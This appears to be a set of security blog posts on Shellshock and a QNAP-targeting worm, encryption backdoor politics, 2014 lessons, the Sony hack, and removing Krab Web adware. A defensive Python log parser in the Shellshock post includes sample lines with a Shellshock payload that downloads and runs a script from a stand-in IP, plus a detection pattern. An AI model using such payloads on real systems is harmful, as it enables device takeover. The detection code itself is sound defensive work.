Cleaning up after mass events like Shellshock (the Bash bug) and Heartbleed isn’t straightforward. Sadly, one patch does not fit all when there are multiple iterations of operating systems and devices. And the truth is, there just aren’t enough good people or hours in a day to comb through all the stuff out there to find and fix what’s at risk, much as we want to. Much as we need to. What happens next is inevitable. The adversary takes advantage, finds the hole, and builds exploits that we then must find and shut down in a series of blocks and tackles.

Here’s a recent case in point: Shellshock and QNAP. Shellshock doesn’t just impact servers. It impacts any internet-exposed device that runs a vulnerable Bash and lets untrusted input reach it: wireless access points, routers, smart fridges, video cameras, webcams, even light bulbs. You can patch a server. It’s not so easy to patch a fridge. The real challenge has been to identify and patch all those different exposed devices. QNAP makes network attached storage devices that are popular world-wide, and therefore ideal targets for Shellshock exploits.

While QNAP did issue a firmware patch in October, a Shellshock worm targeting its devices was detailed in December. The worm went after a particular CGI script, /cgi-bin/authLogin.cgi, which could be reached without authentication. That allowed attackers to launch a shell script that could download more malware in future. Essentially, keeping the backdoor open.
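Here is what those probes look like in a web server’s logs, as an added example (not from Kaspersky’s write-up or from QNAP): a small parser for Apache’s combined log format that looks for the `() {` function-definition marker Shellshock abuses in the User-Agent and Referer headers, pulls out the command that would run, and flags requests aimed at the QNAP login CGI mentioned above. The three log lines are constructed, with IPs from the documentation ranges and an invented download location.

```python
import re

# --- Constructed sample: three Apache "combined" log lines. IPs come from the
# documentation ranges; the payloads mimic Shellshock probes, not any real capture.
SAMPLE_LOG = r'''
203.0.113.7 - - [10/Dec/2014:09:12:01 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget -O /tmp/x.sh http://198.51.100.20/x.sh; sh /tmp/x.sh\""
198.51.100.3 - - [10/Dec/2014:09:12:05 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Dec/2014:09:13:44 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 404 0 "() {:;}; /usr/bin/id" "curl/7.38.0"
'''

# Combined log format; Apache escapes embedded quotes in fields as \" so the
# quoted-field pattern allows backslash escapes.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
# The exported-function marker vulnerable bash parsed: "() {" with any spacing,
# a body, the closing brace and the ";" after which the injected command follows.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')
QNAP_LOGIN_CGI = "/cgi-bin/authLogin.cgi"


def unescape(field):
    """Undo Apache's backslash escaping inside a quoted log field."""
    return re.sub(r'\\(.)', r'\1', field)


def find_shellshock(log_text):
    """Return one finding per header that carries the Shellshock marker."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        request = m.group("request")
        path = request.split(" ")[1] if " " in request else request
        for field in ("referer", "ua"):
            value = unescape(m.group(field))
            hit = SHELLSHOCK_RE.search(value)
            if not hit:
                continue
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "path": path,
                "field": field,
                "payload": value[hit.end():].strip(),   # the command bash would run
                "qnap_login_cgi": path == QNAP_LOGIN_CGI,
            })
    return findings


if __name__ == "__main__":
    for f in find_shellshock(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} via {f['field']}: {f['payload']}"
              + ("  [QNAP login CGI]" if f["qnap_login_cgi"] else ""))
```

Match on the marker, not on any particular payload, because the payload is whatever the attacker wants to run. The same marker turns up in Cookie and Host headers and in query strings too, so extend the fields the parser inspects to whatever your log format records.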

One of the interesting things noted about this worm, per Kaspersky’s detailed write up, was that the script it made then downloaded and installed QNAP’s Shellshock patch. Yes! But in a move that was strictly territorial to keep other opportunistic attackers out.

Kaspersky advised that

“IT staff responsible for these devices’ security should apply patches themselves, or a worm will do it. At a price.”

I’ve followed up with QNAP, and nothing else has been issued. The onus is on the users to identify and patch their products. Need I say more?

It’s easy to lose track when the tyranny of the urgent sets our agendas for us. And it’s hard to be proactive when you’re busy fighting fires. But the fact is we need to keep watching those backdoors – because they don’t always shut completely.

This post was featured on DarkMatters, the security blog by Norse Corp

The lead illustration is an actual screencapture of Shellshock malware by MalwareMustDie.org, a whitehat security research workgroup

Why Encryption Matters: Political Insecurity vs InfoSec


You own your own security. Bottom line: when it comes down to planning how to protect yourself and what is yours, that decision should belong to you. But that’s not what President Obama, UK Prime Minister David Cameron or French President François Hollande would have you believe after their exchange of inflammatory rhetoric last week. If these three leaders have their way, rather than securing our freedoms in the face of terrorism, they’ll be restricting the safeguards we need in place, and opening the cyber backdoor to the very threats they fear most.

It appears fear fuelled knee-jerk reactions following the horrific terror attacks in France. President Hollande called for tighter surveillance measures that could weaken or cripple encryption in France. That encouraged UK Prime Minister David Cameron to say he’d like to ban certain forms of encryption, which would hit popular messaging apps like iMessage and WhatsApp. You can read this post by Cory Doctorow for a shopping list of what they want to limit: http://boingboing.net/2015/01/13/what-david-cameron-just-propos.html. US President Obama’s new cybersecurity proposal followed hard on the heels of Cameron’s call to outlaw encryption. Instead of strong encryption, they want “backdoors” built into applications that would allow government officials to read all media and messages, effectively giving the state far more access and control over everyone else. But as Cory so aptly points out, “there’s no back door that only lets good guys go through it.”

Official White House photo by Pete Souza

When Obama delivers his State of The Union address on January 20th, he’s going to make his case against encryption, and against the people in InfoSec who watch our backdoors constantly, identifying and tracking down threats from around the world.  There is a lot of money being made by people who can breach security, acquire our personal data, and sell it to the highest bidder.  The stakes are much higher when it comes to securing our critical infrastructure: power, water, communications, defense.  We have clear proof that those systems have already been targeted and penetrated.  Those systems are vital to our way of life, and deserve the best protection we can offer.

Rob Graham has written an excellent response to this in his blog, Errata Security, and he levels this warning: “The most important innovators this law would affect are the cybersecurity professionals that protect the Internet. If you cared about things such as “national security” and “cyberterrorism”, then this should be your biggest fear…This creates an open-door for nation-state hackers and the real cybercriminals.” http://blog.erratasec.com/2015/01/obams-war-on-hackers.html#.VL1RgkfF_p6.


Call me crazy, but I think we should listen to those who know a lot more than the rest of us. Misguided Security warns: “once this Pandora’s Box is opened, it’s going to be damn hard to shut and the talented people who do great research and help protect the public from people and organizations that are truly scary”. http://misguidedsecurity.blogspot.ca/2015/01/wi-fight.html Encryption keeps data and identities safe, whereas backdoors and uninvited surveillance create risk.

These guys aren’t the hackers – they’re the ones that protect us from them.  Yet the term is dangerously misunderstood. Rob Graham explains “Because of our knowledge, we do innocent things that look to outsiders like “hacking”. Protecting computers often means attacking them.” There’s a diligent army of highly skilled folks working on our behalf out there, scrutinizing infinite lines of code to catch what we don’t want to have. They share what they learn in real time, a collaborative, co-operative and highly effective network. Given the opportunity, we really should be listening to them.

Thanks to the folks in InfoSec and the tools they use daily, I’ve watched botnets being launched by attackers from China. To see what is coming at us in real time, just click on this link to a map by Norse: http://map.ipviking.com/

We need the freedom to innovate and explore technology so that it will serve us better. As Rob Graham points out, “Internet innovation happens by trying things first then asking for permission later. Obama’s law will change that.” How can we defend ourselves if we handcuff those who do? There’s currently a movement afoot within the InfoSec community to spread the word and explain the real value of encryption so that everybody understands they have a stake in this. (I admit, I may be owning one of these shirts myself).

Currently, this seems to be couched as a “tech” issue, with the political pundits throwing words around like “cyber”, “encryption” and “hacker”, terms that can easily be used in a campaign of fear-mongering by government policy makers to assume control. The assumption is that the average person will probably stop listening because they consider this out of their realm, so it doesn’t apply to them. But that couldn’t be further from the truth. This argument is not just about technology anymore. It challenges current standards of freedom and privacy, and within that, how we get to protect ourselves. And everything we hold dear. Isn’t that our decision to make?

My Top 10 List: So What Did We Learn in 2014

There is no question that 2014 has been a most eventful year for InfoSec – and that’s not necessarily a good thing.  Data breaches, malware attacks, compromised Point-of-Sales systems, more data breaches. And of course – the Sony hack. A lot of painful lessons have been learned, many at high cost. So as the year draws to a close, let me present my Top 10 List of what I hope we learned from this year of events we wish we could forget.

1. PATCH IT. Patch it good! System software patches are an integral part of keeping your business, and yourself, safe. Windows, Linux, Adobe, Oracle, to name a few, all offer regular patches to cover those vulnerabilities that leave them exposed to hackers looking for a way in. Ideally, you should have a regular (i.e. monthly) schedule where patches are checked and updated. Another thing to remember: test patches before you apply them. Microsoft has had two terrible months in a row issuing then recalling bad patches, but not before inflicting some major headaches on those who had already applied them. http://www.darkreading.com/application-security/time-to-rethink-patching-strategies/a/d-id/1318256?_mc=RSS_DR_EDT&utm_source=dlvr.it&utm_medium=twitter

2. THINK before you click that link. Phishing and malvertising have reached prolific levels, and are designed so well it’s easy for anyone to fall for the bait. The onus is on us to be certain we know and trust the sender before we open attachments or click on links. Visiting popular websites or social media hopping is an open invitation to a nasty case of malware because many of these destinations have now become choice phishing holes. Don’t get lured in. http://www.esecurityplanet.com/malware/dridex-and-email-a-nasty-social-engineering-team.html

3. Pass on that Password. This is your first and your best defence to secure anything of value.  Here is how to do it right. Ideally a length of 16 characters, with a mix of upper and lower cases, including numbers and special characters. Oh – and take a tip from Sony. Don’t file under “Passwords”. http://www.wired.com/2014/09/dont-get-hacked/?linkId=9521469

4. AntiVirus Protection. There is a range of options, and many good SOHO programs are even free, though I would strongly encourage paying more to invest in additional protection against cyber threats. And yes, you definitely need to have this on your phone and tablet. Mobile devices are targets of choice. Given how much of our lives we keep on our phones, why would you put that at risk? Finally, don’t rely on outdated or lapsed programs. In the constantly evolving world of malware and viruses, yesterday’s solutions won’t cut it. Always keep your AV updated.

5. Breach Protocol 101. If you get breached, handle the situation correctly and professionally. Your customers deserve the decency of being informed as soon as possible to protect themselves and take appropriate action. As in the case of Home Depot, don’t make customers wait for the bad news. Because you can’t put a price on trust and reputation. http://www.theglobeandmail.com/report-on-business/international-business/us-business/home-depot-shares-drop-after-chain-investigates-data-breach/article20308768/?cmpid=rss1&click=sf_rob

6. Secure your SOHO tech. Especially routers. Update, upgrade.
http://blog.norsecorp.com/2014/12/18/millions-at-risk-from-misfortune-cookie-soho-router-vulnerability/?utm_content=buffer85c25&utm_medium=social&utm_source=twitter.com&utm_campaign=bufferrouter

7. WiFi Hotspots: Use with extreme caution! In this holiday season of travel and shopping, convenience may be king, but letting your guard down isn’t worth it. Secure your tech first; ‘Free’ comes with a price. http://www.onguardonline.gov/articles/0014-tips-using-public-wi-fi-networks

8. Things aren’t so fantastic when you pay in plastic. This year has proven repeatedly that credit cards are not secure. But given that so much of our retail and online world runs on plastic, what can you do to stay safe? For starters, Always Check Your Statements. Be in charge of your accounts and know everything coming or going. Secondly, cover the keypad when you enter a PIN anywhere. Because there really are “eyes in the skies” that are waiting for you to enter the magic number.

9. You get what you paid for. When you buy pirated software and 3rd party apps, you often get a free gift-with-purchase, but trust me, it’s one you don’t want. Malware, browser hijackers, etc. It’s a headache to hunt down and then remove these nuisance products. You’re better off paying for the real deal. http://www.scmagazine.com/pirated-joomla-wordpress-drupal-themes-and-plugins-contain-cryptophp-backdoor/article/385552/

10. Best for Last. HAVE A PLAN. When it happens, and it will, have a real Disaster Recovery/Business Continuity plan in place. According to expert Dejan Kosutic, “It is the combination of people and technology that keeps a business running, not computers only, and this is exactly why the concept of business continuity has prevailed in the last couple of years.” According to CISCO, “60% of Canadian businesses either don’t have a security strategy in place, or don’t know if their current one accounts sufficiently for change and evolution to effectively meet threats.” http://www.itworldcanada.com/article/majority-of-canadian-firms-not-prepared-for-cyber-threats-cisco/100226

And on that cheery note, let me wish you all a safe and successful 2015!

What We Should Learn from Sony’s Pain

It is THE biggest news story. Period. And it will be a story that will live on in the telling because it wasn’t just how it happened, it was why. The hacker attack two weeks ago on Sony was an unprecedented take-down of a global corporate giant by the Guardians of Peace (GOP), a group of cyber-terrorists operating from a small country across the globe.

By now, we all have heard the allegations against North Korea as being the power behind the hackers. North Korea is highly volatile, an unpredictable player in the current global theatre. That means their actions are more threatening. While there is no definitive proof, the code was written in Korean. Email messages have been sent from the GOP, a hacker group based in North (not South) Korea, demanding Sony take down the film ‘The Interview’ about assassinating leader Kim Jong Un. And then there’s the fact that in North Korea, a country known for austerity and deprivation, hackers are state-sponsored and treated as an elite group.

They clearly have no problem developing a very malicious form of malware that disabled or destroyed equipment. This type of malware may have been used before. “Shamoon”, as it was known then, hit 30,000 computers in 2012 in an attack against the oil company Saudi Aramco, and then again in an attack against South Korea in 2013. Moreover, they were able to access and operate within Sony’s systems without detection for a considerable length of time. Sony is a private corporation, but what if this had been done to a major power supplier, water regulator, or another entity considered part of the critical infrastructure? Cybercrime becomes cyber-terrorism.

The economic costs to Sony will be staggering in terms of loss: equipment, intellectual property, confidential and personal data. Never mind the decimation of employee morale and company reputation. The hackers have been contacting families at Sony, telling them they must take their side or else. The GOP got their timing right, striking just before the Christmas release peak season, and they have brought Sony to its knees.

So what do we take away from this? Back in June, North Korea promised to “mercilessly destroy” anyone associated with the film. Did Sony not see this coming? Whatever they suspected, no provisions appear to have been made. Now, it’s damage control. And here’s the first lesson going forward for us all – as details unfold, they further expose the open wound and that can be more painful than the attack itself. In Sony’s case, it’s been revealed that they kept corporate passwords in a file called ‘Passwords’. Yes, I know. While that in itself didn’t facilitate the attack, it implies that Sony was careless, inviting further unwanted speculation.
And here is the second hard lesson: regardless of how good a defense companies put up against outside hacks, they’re only as good as the weakest link in the security chain, which more often than not is human error. In Sony’s case, that meant the problem could have come from within, as simple as someone unwittingly opening those carefully constructed security doors to let the attackers in. For all that companies train and advise their staff, they cannot control their every move or decision. Malware has become an art form in deception, reflecting the spectrum of human weakness.

My hard look at the bottom line: Sony didn’t know how the GOP would strike, but they knew they were at risk, and who the threat was. If this attack could be attributed to state-sponsored North Korean hackers, then current concerns being expressed for the safety of our critical infrastructure need more than words and firewalls. The onus was on Sony to secure their assets, ensuring what measures they had in place were effective. If due diligence is where we can all fall short, we need to close that door or risk more events like this.

A Nasty Case of Krab Web

It can happen to anyone. Suddenly, your computer screen is an explosion of pop-ups. You think you’ve clicked close only to have another pop-up take its place.  And then they start opening something you never agreed to. Frantically, you try to shut things down only to discover your cursor has a mind of its own. You try to Google what to do, and keep going to a site you’ve never heard of and don’t want. Welcome to the nightmare of a malware infestation.

MALWARE ATTACK! What Do I Do NOW?

I just spent some quality time cleaning a nasty case of Krab Web malware off a laptop. The user had no idea what the item she downloaded would come bundled with. So, let that be my first helpful lesson to you. Unless you download directly from the source, you are getting your downloads from a third-party distributor. The names are common, including biggies like CNET and Softonic. It isn’t that you can’t trust them. It’s that even they can’t trust what’s going into the mix. Your best bet is to forgo the default installation choice and choose “custom”. Because when you just click and agree, a couple of pages will zoom past. You may think you agreed to another toolbar, but you just signed on the dotted line for a dozen (no, I am so not kidding) a dozen or more annoying and even malicious programs that will take you where you do not want to go. By this, I mean sites where they are phishing for you and downloadable remote access bogeys lurk. But that is a whole separate posting of pain for another day.

STEP 1: Identify and Destroy

Let’s say you are on Windows. Open the Control Panel. Then, select Programs and Uninstall. Try to bear with all the pop-up boxes and not click anything. Once the list of programs appears, click on the Date column to bring up the items most recently added. You should see a list of at least 12 or so from when you did your download. Some will say “Optimizer”, some will say “Protection”, some will say “Best deals”. They are all bogus. You want NONE of them. Start by selecting each one and clicking Uninstall. You can agree to let the program’s own uninstaller remove it. That’s normal, and the best way to get rid of them. Here’s what I tossed in the trash:

  • Remote Desktop Access VuuPC
  • PepperZip
  • Optimizer Pro
  • StormWatch
  • Search Protection
  • My PC Backup
  • Surfkeepit
  • eDeals
  • SPT System Updater Service
  • Word Prozer
  • HQ ProVideo
  • Fast Player

Yes, they may sound legit.  But they all had today’s date stamp, and some of them were particularly nasty malware/adware.  As the song says “Don’t Get Fooled Again!”

STEP 2: Remove Adware using ADWCleaner

You may be able to access your browser at this point. If you can, go to this site: ADWCLEANER DOWNLOAD LINK to download an effective Adware cleaner.

Follow the instructions and install. Click on the “Scan” button and then click “Clean”.  You’ll have to reboot.

STEP 3: Remove program files with MalwareBytes

Now, you need a program to go after the virus, Krab in this case. Download MALWAREBYTES ANTI-MALWARE. Follow the prompts and install the free version. If prompted, click the green “Fix now” box to start the scan.

You may be prompted to apply updates. Click agree. The program will scan, you can watch the progress, and when it’s done you’ll be notified. The dangerous files will be quarantined, and expect to be asked to reboot. Say yes.

STEP 4: Clean your Browsers

You will probably notice a delightful lack of pop-ups this time. But you’re not in the clear yet. You need to clean your browsers now. Follow these steps as outlined.

If you use Internet Explorer, click on the right corner gear icon for Settings. From the drop down box, click Internet Options.

In the next box, click on the “Advanced” tab. Click on the “Reset” button. In the next box, select “Delete Personal Settings” and click “Reset”. When Explorer is finished, click “Close”.

For Google Chrome, click the menu symbol at the top right. Then, click on “Tools” and then “Extensions”.

In the Extensions tab, you’ll see Krab Web and other items, some of which you won’t recognize. Click on the trash can icon beside those you want to remove. If you didn’t install it, delete it.

STEP 5: Check the Spread

A note of caution: Malware spreads with physical contact, so you need to check any other devices you’ve connected to your computer, like USB or flash drives, tablets, or even your phone. Run a scan using your anti-virus and Malwarebytes. Trust me, you’ll be glad you did. Now you’re clean and protected. Surf safe!
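The manual triage in Step 1 (sorting the program list by date) and Step 4 (looking through the Chrome extension list) can also be done from a PowerShell prompt before touching anything. The script below is an added example, not part of the original post or of any of the tools it names: it reads the Windows uninstall registry keys and Chrome’s on-disk extension folder, and only reports; the $Days parameter and the two-day default are assumptions.

```powershell
# Added example (not from the original post): read-only triage for Steps 1 and 4.
# Lists programs registered in the last $Days days (the "Date" column the post
# sorts on) and the Chrome extensions present on disk, so bundled junk such as
# "Optimizer Pro" or "Search Protection" is spotted before uninstalling.
# Nothing is changed; removal still goes through Control Panel, AdwCleaner and
# Malwarebytes as the post describes. $Days is an assumed parameter.
param([int]$Days = 2)

# Both 64-bit and 32-bit program registrations plus per-user installs.
$uninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
)
$cutoff  = (Get-Date).Date.AddDays(-$Days)
$culture = [System.Globalization.CultureInfo]::InvariantCulture
$styles  = [System.Globalization.DateTimeStyles]::None

$recent = foreach ($key in $uninstallKeys) {
    Get-ItemProperty -Path $key -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -and $_.InstallDate } |
        ForEach-Object {
            # InstallDate is stored as a yyyyMMdd string; malformed values are skipped.
            $d = [datetime]::MinValue
            if ([datetime]::TryParseExact($_.InstallDate, 'yyyyMMdd', $culture, $styles, [ref]$d) -and
                $d -ge $cutoff) {
                [pscustomobject]@{
                    Installed       = $d.ToString('yyyy-MM-dd')
                    Name            = $_.DisplayName
                    Publisher       = $_.Publisher
                    UninstallString = $_.UninstallString   # what Control Panel would run
                }
            }
        }
}
"Programs registered since $($cutoff.ToString('yyyy-MM-dd')):"
$recent | Sort-Object Installed -Descending | Format-Table -AutoSize

# Step 4: Chrome stores each extension as <id>\<version>\manifest.json under the profile.
$extRoot = Join-Path $env:LOCALAPPDATA 'Google\Chrome\User Data\Default\Extensions'
if (Test-Path $extRoot) {
    "Chrome extensions on disk (anything you did not install yourself is a suspect):"
    Get-ChildItem $extRoot -Directory | ForEach-Object {
        $manifest = Get-ChildItem $_.FullName -Recurse -Filter manifest.json | Select-Object -First 1
        if ($manifest) {
            $m = Get-Content $manifest.FullName -Raw | ConvertFrom-Json
            # Localized extensions show a __MSG_*__ placeholder as the name; the id still identifies them.
            [pscustomobject]@{ Id = $_.Name; Name = $m.name; Version = $m.version }
        }
    } | Format-Table -AutoSize
}
```

Run it from an elevated prompt if you want the HKLM entries; a standard user prompt still shows per-user installs and the Chrome extension folder.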

** A big thank you to MalwareTips.com and their helpful site